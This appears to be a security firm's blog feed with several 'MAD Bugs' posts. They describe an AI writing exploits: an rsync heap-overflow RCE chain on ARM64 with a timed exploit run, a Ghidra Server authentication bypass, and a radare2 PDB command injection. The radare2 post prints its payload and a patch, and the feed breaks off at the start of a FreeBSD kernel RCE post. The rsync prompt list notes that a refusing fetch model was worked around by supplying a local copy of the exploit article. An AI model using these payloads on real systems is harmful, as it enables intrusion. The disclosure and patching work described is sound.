overwrites<br>bytes 8-15 of the command string at <code>+0x108</code>. <code>system("touch /t")</code><br>tried to write to <code>/</code> and failed silently. Claude moved the command to<br><code>+0x58</code> (inside the <code>ctx_md</code> union, which the OpenSSL path never<br>touches), which fixed it.</p><p>Five issues total, all found and fixed without ever attaching a real<br>debugger:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">| #  | What broke                               | How Claude found it                             |
|----|------------------------------------------|-------------------------------------------------|
| A1 | Leak target at `sum2+24`, not `+8`       | LD_PRELOAD memcmp hook                          |
| A2 | `count=3277` destabilizes the stack      | Per-connection probe across 5 runs              |
| A3 | Command truncated at byte 8              | ptrace bp on `shell_exec` + `match_sums` disasm |
| A4 | ARM64 glibc 2.36 still wants ONE filter  | `malloc_usable_size` test                       |
| A5 | Three protocol mismatches in `rsync_lib` | socat wire capture vs. real client              |</code></pre></div><h2>Timeline</h2><p>About <strong>90 minutes</strong> from a cold container to the first proof file. Claude<br>reconstructed this from daemon log timestamps and file mtimes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">| Elapsed | Milestone                                                                                                  |
|---------|------------------------------------------------------------------------------------------------------------|
| 0:00    | First daemon banner. `rsync_lib` doesn't exist yet.                                                        |
| 0:30    | Protocol library working: file list parsed, download verified. Three wire-format bugs fixed along the way. |
| 0:37    | Info-leak oracle confirmed: `token=-1` means MATCH. The `memcmp` hook found the LR at `sum2+24`.           |
| 0:59    | Heap overflow lands. Server child crashes silently, proof the write hit `.bss`.                            |
| 1:29    | ptrace breakpoint on `shell_exec`: hit, `X0` correct, fork observed. Still no proof file.                  |
| 1:34    | First `/tmp/rce_proof.txt`. Bug A3: `last_match = 0` was zeroing `cmd[8:16]`. Moved cmd to `+0x58`.        |</code></pre></div><p>The split was roughly even: a third building the protocol library, a<br>third finding the ARM64 leak target, a third figuring out why<br><code>shell_exec</code> ran but the file never appeared.</p><h2>"It works but it's slow"</h2><p>First successful run: about five minutes. The leak now needs 24 bytes<br>(not 8), at ~128 connections per byte, ~120ms per connection.</p><p>I told Claude:</p><blockquote><p><strong>Your exploit now takes 5 minutes to run, probably because of the</strong><br><strong>brute-forcing in first step. Make it faster.</strong></p></blockquote><p>Claude came back with two stacked changes. First, a hint table: it had<br>noticed during the leak debugging that 18 of those 24 bytes are<br>structural constants on ARM64. User-space addresses are<br><code>0x0000_aaaa_xxxx_xxxx</code> for the binary, <code>0x0000_ffff_xxxx_xxxx</code> for the<br>stack. The page-offset bits of the leaked pointer are exactly the<br>page-offset bits of <code>LEAK_OFFSET</code> (the base is page-aligned). It encoded<br>those as first-try hints, one connection each. Second, for the ~6 truly<br>random bytes, it wrapped the probe in <code>ThreadPoolExecutor(16)</code> to<br>dispatch all 256 guesses concurrently and take the first match.</p><p>The exploit now takes 14 seconds:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">mkdir -p /tmp/rsync_test_module
echo "hello world"   &gt; /tmp/rsync_test_module/foo.txt
echo "test data here" &gt; /tmp/rsync_test_module/bar.txt
cp rsyncd_test.conf /tmp/
/tmp/rsync-3.2.7/rsync --daemon --config=/tmp/rsyncd_test.conf --port=12000 --address=127.0.0.1
time python3 exploit.py "rsync://127.0.0.1:12000/files" "id &gt; /tmp/rce_proof.txt"
[*] Phase 1: info leak  |  file=bar.txt size=15
    sum2[8] = 0x00  (1 total connections)
    sum2[9] = 0x00  (2 total connections)
    sum2[10] = 0x00  (3 total connections)
    sum2[11] = 0x00  (4 total connections)
    sum2[12] = 0xab  (260 total connections)
    sum2[13] = 0xaa  (261 total connections)
    sum2[14] = 0x00  (262 total connections)
    sum2[15] = 0x00  (263 total connections)
    sum2[16] = 0x00  (519 total connections)
    sum2[17] = 0x7a  (775 total connections)
    sum2[18] = 0xde  (1031 total connections)
    sum2[19] = 0xee  (1287 total connections)
    sum2[20] = 0xff  (1288 total connections)
    sum2[21] = 0xff  (1289 total connections)
    sum2[22] = 0x00  (1290 total connections)
    sum2[23] = 0x00  (1291 total connections)
    sum2[24] = 0xc4  (1292 total connections)
    sum2[25] = 0xae  (1293 total connections)
    sum2[26] = 0xdc  (1549 total connections)
    sum2[27] = 0xd2  (1805 total connections)
    sum2[28] = 0xaa  (1806 total connections)
    sum2[29] = 0xaa  (1807 total connections)
    sum2[30] = 0x00  (1808 total connections)
    sum2[31] = 0x00  (1809 total connections)
[+] Leaked .text ptr : 0xaaaad2dcaec4
[+] Binary base      : 0xaaaad2da0000

[*] Phase 2: heap overflow &#8594; RCE
    shell_exec = 0xaaaad2dca120
    ctx_evp    = 0xaaaad2e54fb0
    payload    = 344 bytes at &amp;ctx_evp
    fake_ctx   = 0xaaaad2e54fb8 (+8)
    fake_evpmd = 0xaaaad2e55050 (+160)
    cmd_addr   = 0xaaaad2e55008 (+88)
    target ndx=1 file=bar.txt
    sending payload (344 bytes) to &amp;ctx_evp...
    overflow complete, consuming server output...
    server connection ended: connection closed
[+] Payload delivered.

real  0m14.383s
user  0m0.674s
sys 0m1.609s
cat /tmp/rce_proof.txt</code></pre></div><h2>The audit</h2><p>Before any of this, the same teammate had asked Claude to audit the<br>patched rsync:</p><blockquote><p><strong>now that you have a good grasp of this vulnerability and exploitation</strong><br><strong>can you audit the latest rsync for variants that may allow exploitation</strong></p></blockquote><p>Claude went file-by-file through all 48 <code>.c</code> source files in 3.4.1 (the<br>version with all CVEs fixed). We're verifying the findings now and<br>preparing reports.</p><h2>Every prompt, both sessions</h2><p>Prompts 1-12 are the original x86-64 session (the teammate driving);<br>13-17 are the ARM64 port (me driving).</p><ol><li><p><em>Initial request</em> &#8212; Asked to exploit rsync CVE-2024-12084 (heap<br>overflow) + CVE-2024-12085 (info leak) into a full RCE chain against<br>rsync 3.2.7 daemon, following the Phrack 72 "Desync the Planet"<br>article.</p></li><li><p><strong>"why are you modifying the rsync source?"</strong> &#8212; I had been adding<br><code>fprintf</code> debug statements to sender.c and recompiling. The user<br>correctly pointed out this shifts binary offsets (ctx_evp, shell_exec,<br>etc.) and invalidates the exploit constants.</p></li><li><p><strong>"you should be using gdb .."</strong> &#8212; Redirected from printf-debugging<br>to GDB. Led to the attach-to-daemon workflow with<br><code>set follow-fork-mode child</code> that proved essential for every<br>subsequent debugging step.</p></li><li><p><strong>"what sandbox"</strong> &#8212; I had confused /tmp file isolation with<br>sandboxing. Clarified the environment.</p></li><li><p><strong>"if you need root the password is x ?"</strong> &#8212; Provided root credentials<br>to fix <code>ptrace_scope</code> (was set to 1, blocking GDB attach). We ran<br><code>echo 0 &gt; /proc/sys/kernel/yama/ptrace_scope</code>.</p></li><li><p><strong>"are you following the phrack exploitation? it outlines it pretty</strong><br><strong>clear"</strong> &#8212; Critical redirect. I had been inventing a multi-entry<br>layout trying to align 40-byte sum_buf strides with 48-byte EVP_MD_CTX<br>field offsets. The Phrack one-shot contiguous write approach is far<br>simpler and more reliable.</p></li><li><p><strong>"read the phrack exploit - they use the info leak + heap overflow</strong><br><strong>to get a reliable exploit."</strong> &#8212; Prompted me to actually read the<br>full Phrack article rather than working from partial understanding.</p></li><li><p><strong>"the writeup is in /tmp/rsync.txt"</strong> &#8212; Pointed to the local copy of<br>the Phrack article. Saved time vs trying to web-fetch it (the<br>WebFetch AI model refused to extract exploit details).</p></li><li><p><strong>"if you need to setup a qemu with the exact debian + rsync used</strong><br><strong>that is fine"</strong> &#8212; Offered to set up the exact Debian 12 target<br>environment. We didn't end up needing this because we adapted the<br>exploit to our Ubuntu 22.04 system, but this would be the fastest<br>path for exact reproduction of the Phrack PoC.</p></li><li><p><strong>"perfect it seems to work!! can you document your whole process +</strong><br><strong>my prompts in a writeup! include how to get it working on other</strong><br><strong>installations etc and debugging instructions."</strong> &#8212; Led to this<br>writeup document.</p></li><li><p><strong>"now that you have a good grasp of this vulnerability and</strong><br><strong>exploitation can you audit the latest rsync for variants that may</strong><br><strong>allow exploitation"</strong> &#8212; Led to the security audit of rsync 3.4.1<br>documented in the appendix.</p></li><li><p><strong>"the WRITEUP didnt include all of my prompts"</strong> &#8212; This correction,<br>leading to this expanded prompt section.</p></li></ol><h3>ARM64 port session</h3><ol><li><p><strong>"Read the WriteUp and reproduce this exploit with exploit.py"</strong> &#8212;<br>Initial port request. Environment turned out to be Debian 12 / arm64<br>/ glibc 2.36 &#8212; different OS, different glibc, different <em>architecture</em><br>from the writeup. No GDB, no strace, no root. Five distinct<br>arm64-specific bugs were found and fixed (&#167;3a). <code>rsync_lib.py</code> was<br>built from scratch by reading the rsync 3.2.7 source &#8212; a socat wire<br>capture of the real client revealed args use <code>\0</code> not <code>\n</code>, checksum<br>negotiation is bidirectional, and <code>write_line</code> was bypassing the<br>multiplex layer (server: "unexpected tag 83" = <code>'Z' - MPLEX_BASE</code>).<br>The trickiest bug: <code>shell_exec</code> <em>did</em> fire and <em>did</em> fork, but<br><code>match_sums</code> zeroes <code>last_match</code> at <code>ctx_evp+0x110</code> before <code>sum_init</code>,<br>truncating the command string at byte 8. Diagnosed with a ptrace<br>breakpoint on <code>shell_exec</code> that printed <code>X0</code> and followed<br><code>PTRACE_O_TRACEFORK</code> &#8212; the fork happened, the cmd pointer was right,<br>but the string read back as <code>"touch /t"</code>. Moved the command to<br><code>+0x58</code> (inside the unused <code>ctx_md</code> struct).</p></li><li><p><strong>"continue"</strong> &#8212; Permission re-grant after a tool-use rejection during<br>the initial daemon startup. Resumed without issue.</p></li><li><p><strong>"Alright, add to the writeup your adaptions"</strong> &#8212; Wrote &#167;3a<br>documenting all five arm64 bugs (A1-A5), the GDB-free debugging<br>methodology (LD_PRELOAD probes, ptrace crash-catcher, pattern-payload<br>survival test), and the working run output.</p></li><li><p><strong>"Your exploit now takes 5 minutes to run, probably because of the</strong><br><strong>brute-forcing in first step. Make it faster."</strong> &#8212; Two stacked fixes:<br>a hint table (18/24 bytes are structural constants on arm64 &#8212; <code>0x00</code><br>canonical bits, <code>0xaa</code>/<code>0xff</code> region prefixes, <code>LEAK_OFFSET</code> page-<br>offset bits) and a <code>ThreadPoolExecutor(16)</code> for the truly random<br>bytes. 5 minutes &#8594; 14 seconds.</p></li><li><p><strong>"Add to the writeup the ARM64 environment, and a note about</strong><br><strong>speeding up, including a sample run [...] Also update the user</strong><br><strong>prompts with the prompts/responses so far"</strong> &#8212; Added the arm64<br>environment table to &#167;0, the speedup section + timed run to &#167;3a,<br>and these five entries to &#167;7.</p></li></ol><p>PoCs and writeups: <a href="https://github.com/califio/publications/blob/main/MADBugs/rsync/">https://github.com/califio/publications/blob/main/MADBugs/rsync/</a>.</p><p>&#8212;ryan &amp; thai</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: Claude Found an Auth Bypass in NSA's Ghidra Server]]></title><description><![CDATA[This bug may resemble a backdoor in effect, but there&#8217;s no evidence it was intentional. Really.]]></description><link>https://blog.calif.io/p/mad-bugs-claude-found-an-auth-bypass</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-claude-found-an-auth-bypass</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Wed, 08 Apr 2026 07:36:36 GMT</pubDate><content:encoded><![CDATA[<p><a href="https://github.com/nationalsecurityagency/ghidra">Ghidra</a> is an open-source reverse engineering framework developed by the NSA, widely used for finding vulnerabilities in compiled software. Its server component, Ghidra Server, enables teams to collaborate on shared reverse engineering projects with centralized storage and access control.</p><p>Ghidra Server&#8217;s PKI mode is intended to authenticate users via a challenge-response protocol: the server sends a random 64-byte token, the client signs it with their private key, and the server verifies the signature against the client&#8217;s certificate. This proves the client possesses the private key corresponding to the certificate they present.</p><p>This all sounded solid, until Claude spotted a flaw in <a href="https://github.com/NationalSecurityAgency/ghidra/blob/78729379e471bbb3d969409be6a8c3d24af84220/Ghidra/Features/GhidraServer/src/main/java/ghidra/server/security/PKIAuthenticationModule.java#L143-L152">PKIAuthenticationModule.java:143-152</a> that looks like this:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;java&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-java">if (sigBytes != null) {
   verify(signature)
}
// else: skip verification entirely &#128556;</code></pre></div><p>When <code>sigBytes</code> is null, the verification block is skipped entirely &#8212; no exception is thrown. Execution falls through to the Distinguished Name lookup, which resolves the certificate&#8217;s subject DN to a registered username and returns it as the authenticated identity. No proof of private key possession was required.</p><p>This enables a low-privileged analyst to escalate to administrator, exfiltrate or destroy shared reverse engineering databases, and permanently rewrite repository access controls.</p><p>PoC and fix: <a href="https://github.com/califio/publications/tree/main/MADBugs/ghidra-server/">https://github.com/califio/publications/tree/main/MADBugs/ghidra-server/</a>.</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: Discovering a 0-Day in Zero Day]]></title><description><![CDATA[Here&#8217;s how I used Claude to find and patch a radare2 0-day on my first day at Calif.]]></description><link>https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Wed, 08 Apr 2026 01:14:12 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/mmc7A__J_hY" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Timeline:</strong></p><p>All times are in GMT+8 on 2026-04-06.</p><ul><li><p><strong>09:00 AM:</strong> First day at Calif</p></li><li><p><strong>10:18 AM:</strong> Installed Claude Code</p></li><li><p><strong>11:24 AM:</strong> Discovered vulnerability</p></li><li><p><strong>11:48 AM:</strong> Generated RCE PoC</p></li><li><p><strong>2:48 PM:</strong>  <a href="https://github.com/radareorg/radare2/issues/25730">Reported</a> vulnerability</p></li><li><p><strong>3:47 PM:</strong> Opened <a href="https://github.com/radareorg/radare2/pull/25731">Fix PR</a></p></li><li><p><strong>5:00 PM:</strong> Merged PR</p></li></ul><h2>The Target: radare2</h2><p><a href="https://github.com/radareorg/radare2">radare2</a> (r2) is an open-source, CLI-based reverse engineering framework.</p><p>I decided to focus on reverse engineering tools for two reasons:</p><ol><li><p>I actually use them. I even built an <a href="https://jro.sg/CTFs/TISC%202024%20-%20Imphash/">r2-based CTF challenge</a> back in 2024.</p></li><li><p>Parsing and analyzing dozens of executable formats is hard. Historically, binary file parsing has been a rich source of bugs.</p></li></ol><p>An unexpected bonus was the radare2 team&#8217;s very public disclosure policy: security bugs are reported directly on GitHub Issues, just like any other bug. Combined with their rapid triage and patch turnaround, this made for one of the shortest bug-to-patch cycles I&#8217;ve ever experienced.</p><h2>Vulnerability Discovery: Prompt Commentary</h2><p>Setup was simple: a fresh clone of radare2 from GitHub, and Claude Code running with <code>--dangerously-skip-permissions</code>. The model was Claude Opus 4.6 (1M context) with high effort.</p><p>Below, I&#8217;ll walk through the prompts I used, explain the reasoning behind each one, and describe how Claude responded.</p><blockquote><p><strong>Me:</strong> Users are reporting that they have experienced unplanned code execution when analyzing untrusted binaries with this project. Figure out how this has happened.</p></blockquote><p>Previous <a href="https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude">MAD Bugs</a> posts had success with an incident-response-style prompt, so I went with something similar here.</p><p>Claude came back with 5 bugs. They looked plausible, but all of them required non-standard configurations or explicit user approval. I followed up to narrow the scope:</p><blockquote><p><strong>Me:</strong> The users are using default configuration with no projects. They did not perform any suspicious actions either. Assess for memory corruption bugs or other more complex vectors</p></blockquote><p>This time, Claude reported 7 &#8220;Confirmed Exploitable Vectors,&#8221; including 3 &#8220;Critical&#8221; heap and integer overflows. Naturally, I was skeptical, so I asked it to:</p><blockquote><p><strong>Me:</strong> Develop a poc for the unpatched vulnerabilities. Determine if an attacker could have bypassed the patches for the known bugs</p></blockquote><p>The second sentence referenced some recently patched N-days it had found in the Git history, which had been fixed by applying the <code>r_str_sanitize</code> function to sanitize untrusted input.</p><p>Claude struggled to prove, let alone exploit, the memory corruption vulnerabilities. It did appear to be making progress on a &#8220;heap leak&#8221; issue, though, so I gave it a nudge:</p><blockquote><p><strong>Me:</strong> What if you built radare with asan to help with the exploit debugging</p><p><strong>Me:</strong> Assess the exploitability of the vulnerabilities. The attacker must be able to achieve full code execution just by the user loading a binary for analysis</p></blockquote><p>Unfortunately, ASAN revealed that the &#8220;heap leak&#8221; was just a memory leak, not any kind of information disclosure bug:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;d8c18860-12b7-40f3-921b-0c4628cf03ff&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">==44349==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 48 byte(s) in 1 object(s) allocated from:</code></pre></div><p>Time to reset expectations and point Claude toward a more promising direction:</p><blockquote><p><strong>Me:</strong> Memory leak is not a vulnerability. Show a vulnerability with real impact, such as heap overflow. Also, dig deeper into r_str_sanitize and where it should be used but is missing. Explain the impact of those vulns</p></blockquote><p>Claude tried hard to exploit various stack and heap buffer overflows, but failed to trigger a single ASAN crash. It had, however, developed a solid understanding of the command injection N-days, so I redirected:</p><blockquote><p><strong>Me:</strong> Focus on command injection. Find another vulnerability.</p></blockquote><p>Watching Claude&#8217;s thoughts stream rapidly across my screen didn&#8217;t inspire much confidence.</p><p>It seemed like we were running out of leads. Then this appeared:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Let me now look for the ONE remaining angle: the RAD-mode output that gets executed via . (dot) commands. Let me look for &#8220;.i&#8221; patterns in automatic loading:</code></pre></div><p>Soon, we went from &#8220;it&#8217;s over&#8221; to &#8220;we are so back&#8221;:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Confirmed: line 1458 is the only RAD-mode cb_printf with an unsanitized binary-derived string. The vulnerability is clear:
...
Impact: Full code execution when a user opens a PE binary that has a crafted PDB file in the PDB search path. Default configuration, no user interaction beyond r2 binary.exe.
Fix: Sanitize name before interpolation at line 1458, using r_name_filter_dup() or r_str_sanitize().</code></pre></div><p>This looked very plausible. I asked Claude to:</p><blockquote><p><strong>Me:</strong> Generate a test .exe and .pdb file. Prove that the vulnerability is real and exploitable</p></blockquote><p>To do this, Claude had to construct a valid <a href="https://en.wikipedia.org/wiki/Program_database">PDB file</a> containing a malicious symbol name. PDB is a relatively complex binary format, so this took some time.</p><p>At this point, I was fairly confident we were in the home stretch. I offered one last hint:</p><blockquote><p><strong>Me:</strong> Can you use any libraries to build the pdb? Maybe that will be easier</p></blockquote><p>But Claude didn&#8217;t need it. Shortly after, we had the proof:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Arbitrary shell command execution confirmed. A crafted debug.pdb file alongside a PE binary causes !echo PWNED&gt;/tmp/r2_poc_output to execute when the user runs idp in radare2. The output file /tmp/r2_poc_output contains PWNED.</code></pre></div><p>One final prompt to wrap things up:</p><blockquote><p><strong>Me:</strong> Great job! Now, generate a report for this vulnerability. Also create a poc.py, which takes --cmd and generates the target.exe and .pdb file that executes the given command</p></blockquote><p>Total context used was 352.4k/1M tokens.</p><h2>Vulnerability Analysis</h2><p>PDB files contain symbols: mappings between function names and their addresses. Knowing where functions live is incredibly helpful for malware analysis, so r2 has several commands that parse and display this information.</p><p>There&#8217;s the <a href="https://github.com/radareorg/radare2/blob/25edd02/libr/bin/format/pdb/pdb.c#L1463">idpi</a> command, which prints the symbols available:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001000]&gt; idpi
0x140001000  0  .text  my_cool_function</code></pre></div><p>And there&#8217;s <code>idpi*</code>, which prints the r2 commands needed to convert symbol information into flags &#8212; essentially labels for addresses in r2.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001000]&gt; idpi*
f pdb.my_cool_function = 0x140001000 # 0 .text
&#8220;fN pdb.my_cool_function my_cool_function&#8221;</code></pre></div><p>The <code>f</code> command creates a flag (an offset-name mapping) at an address, and <code>fN</code> sets its &#8220;real name&#8221; &#8212; the original, unsanitized display name stored separately from the flag&#8217;s identifier.</p><p>Finally, there&#8217;s <a href="https://github.com/radareorg/radare2/blob/25edd02/libr/core/cmd_info.inc.c#L1886">idp</a>, which is actually an alias for <code>.idpi*</code>. The dot prefix means &#8220;run this command, then execute the output&#8221;.</p><p>You can probably see where this is going, so let&#8217;s just jump right into the <a href="https://github.com/radareorg/radare2/blob/25edd02/libr/bin/format/pdb/pdb.c#L1452-L1458">implementation</a> of the <code>idpi*</code> command:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// pdb.c:1451 &#8211; filtered_name is sanitized via r_name_filter_dup()
filtered_name = r_name_filter_dup (r_str_trim_head_ro (name));
// pdb.c:1452 &#8211; safe: filtered_name in flag creation
pdb-&gt;cb_printf (&#8221;f pdb.%s = 0x%&#8221; PFMT64x &#8220; # %d %.*s\n&#8221;, filtered_name, ...);
// pdb.c:1458 &#8211; VULNERABLE: raw `name` from PDB binary data, NOT sanitized
pdb-&gt;cb_printf (&#8221;\&#8221;fN pdb.%s %s\&#8221;\n&#8221;, filtered_name, name);</code></pre></div><p>By crafting a PDB with a function name like <code>x&#8221; ;!open -a Calculator #&#8221;</code>, we can break out of the double-quoted command and inject arbitrary r2 commands. Since r2 supports executing system commands, RCE follows trivially.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001000]&gt; idpi*
f pdb.x____open__a_Calculator_ = 0x140001000 # 0 .text
&#8220;fN pdb.x____open__a_Calculator_ x&#8221; ;!open -a Calculator #&#8221;</code></pre></div><h2>PoC</h2><div id="youtube2-mmc7A__J_hY" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;mmc7A__J_hY&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/mmc7A__J_hY?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p>Code: <a href="https://github.com/califio/publications/blob/main/MADBugs/radare2/poc.py">poc.py</a></p><h2>Patch Development: Prompt Commentary</h2><p>In a fresh Claude Code session, I started off with:</p><blockquote><p><strong>Me:</strong> Read the poc and report. Determine when the bug was introduced and produce a patch commit, along with tests that prevent a regression of this bug</p></blockquote><p>The first patch Claude generated fixed the vulnerability, but it broke functionality as well:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">-&#9;pdb-&gt;cb_printf (&#8221;\&#8221;fN pdb.%s %s\&#8221;\n&#8221;, filtered_name, name);
+&#9;char *safe_name = r_name_filter_dup (name);
+&#9;pdb-&gt;cb_printf (&#8221;\&#8221;fN pdb.%s %s\&#8221;\n&#8221;, filtered_name, safe_name);
+&#9;free (safe_name);</code></pre></div><p>With that patch applied, the output of <code>idpi*</code> would be:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001000]&gt; idpi*
f pdb.x____open__a_Calculator_ = 0x140001000 # 0 .text
&#8220;fN pdb.x____open__a_Calculator_ x____open__a_Calculator_&#8221;</code></pre></div><p>However, this also strips special characters from legitimate function names, such as <code>std::ostream::operator&lt;&lt;(std::ostream&amp; (*)(std::ostream&amp;))</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001440]&gt; idpi*
f pdb.std::ostream::operator___std::ostream____std::ostream__ = 0x1400014c0 # 0 .text
&#8220;fN pdb.std::ostream::operator___std::ostream____std::ostream__ std::ostream::operator___std::ostream____std::ostream__&#8221;</code></pre></div><p>Thus, I got Claude to reconsider:</p><blockquote><p><strong>Me:</strong> What is the intent of the fN command and does the fix affect its intend       behavior?</p><p><strong>Me:</strong> This is a critical problem. if we sanitize the real name, then this is useless. How can we properly address it?</p></blockquote><p>Claude came back with a clean solution: base64-encode the raw name before interpolation.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Here's what I found. There are two viable approaches:

Option 1: Add base64: support to fN (matches existing pattern)

The flag system already uses base64 in several places:
- fC (flag comment) accepts base64: prefix and decodes it at
cmd_flag.inc.c:2085
- fu serializes realname as base64 at line 1536, and decodes it back at line
1517

But fN itself (line 2163) does not support the base64: prefix &#8212; it takes the
raw string directly via strchr(name, ' ') and passes it straight to
r_flag_item_set_realname.

The fix would be two-sided:

1. Emit side (print_gvars): base64-encode the raw name
2. Receive side (fN handler): detect and decode base64: prefix

This is the cleanest approach because it completely avoids the parsing problem
&#8212; base64 output contains only [A-Za-z0-9+/=], which has zero overlap with r2
metacharacters.</code></pre></div><p>Satisfied with the approach, I opened a <a href="https://github.com/radareorg/radare2/pull/25731">PR with Claude&#8217;s changes</a> and waited for the maintainers to respond.</p><h2>Resolution</h2><p>About an hour later, a maintainer pointed out that the vulnerability could be fixed more simply &#8212; by prefixing the <code>fN</code> command with a single quote (<code>&#8217;</code>), which disables special character processing in r2.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext"># Safe - no calc popped
&#8216;fN pdb.x____open__a_Calculator_ x;!open -a Calculator #</code></pre></div><p>Nonetheless, they recognized it as a real and critical vulnerability, and agreed that the base64 prefix was a worthwhile addition.</p><p>The PR was <a href="https://github.com/radareorg/radare2/commit/0e38152560e689327a74d2944fa45ba7afd4cb33">merged</a>, and string sanitization was <a href="https://github.com/radareorg/radare2/commit/253587680e000266e94cbf98c27a17ada4cd29e9">further enhanced</a> in a follow-up commit &#8212; likely part of a broader effort to address the spate of recent command injection vulnerabilities.</p><h2>Conclusion</h2><p>We are now in an era where AI can rapidly discover and exploit bugs in large, complex open-source projects. Constructing a valid PDB file would have taken me at least a few hours manually. Claude did it in under 30 minutes.</p><p>That said, finding bugs is the easy part. Claude just needs to identify a possible injection site, trace how to reach it, and develop a PoC it can verify and iterate on.</p><p>Patching is harder. It requires a much deeper understanding of the project, not just where the vulnerability occurs, but why the surrounding code is designed the way it is. In this case, Claude&#8217;s first patch was technically correct but semantically wrong: it fixed the injection without understanding what fN was actually for. It took explicit pushback to get to a solution that was both safe and useful.</p><p>That dynamic is worth keeping in mind. AI-assisted vulnerability research compresses the timeline dramatically, but the human still has to understand the system well enough to know when a fix is incomplete. The bottleneck has shifted, from finding bugs to understanding them well enough to fix them properly.</p><p>&#8212;junrong</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: Claude Wrote a Full FreeBSD Remote Kernel RCE with Root Shell (CVE-2026-4747)]]></title><description><![CDATA[To our knowledge, this is the first remote kernel exploit both discovered and exploited by an AI.]]></description><link>https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Tue, 31 Mar 2026 17:35:54 GMT</pubDate><content:encoded><![CDATA[<p><strong>Timeline:</strong></p><ul><li><p><strong>2026-03-26:</strong> FreeBSD published an advisory for <a href="https://www.freebsd.org/security/advisories/FreeBSD-SA-26:08.rpcsec_gss.asc">CVE-2026-4747, crediting &#8220;Nicholas Carlini using Claude, Anthropic&#8221;</a> for a remote kernel code execution.</p></li><li><p><strong>9:45AM PDT 2026-03-29:</strong> We asked Claude to develop an exploit.</p></li><li><p><strong>5:00PM PDT 2026-03-29:</strong> Claude delivered a working exploit that drops a root shell.</p></li></ul><p><strong>Total time: ~8 hours wall clock. The human was AFK for much of it; Claude&#8217;s actual working time was ~4 hours.</strong></p><p>Claude actually wrote two exploits using two different strategies. Both worked on the first try. Here&#8217;s what it looks like:</p><div class="highlighted_code_block" 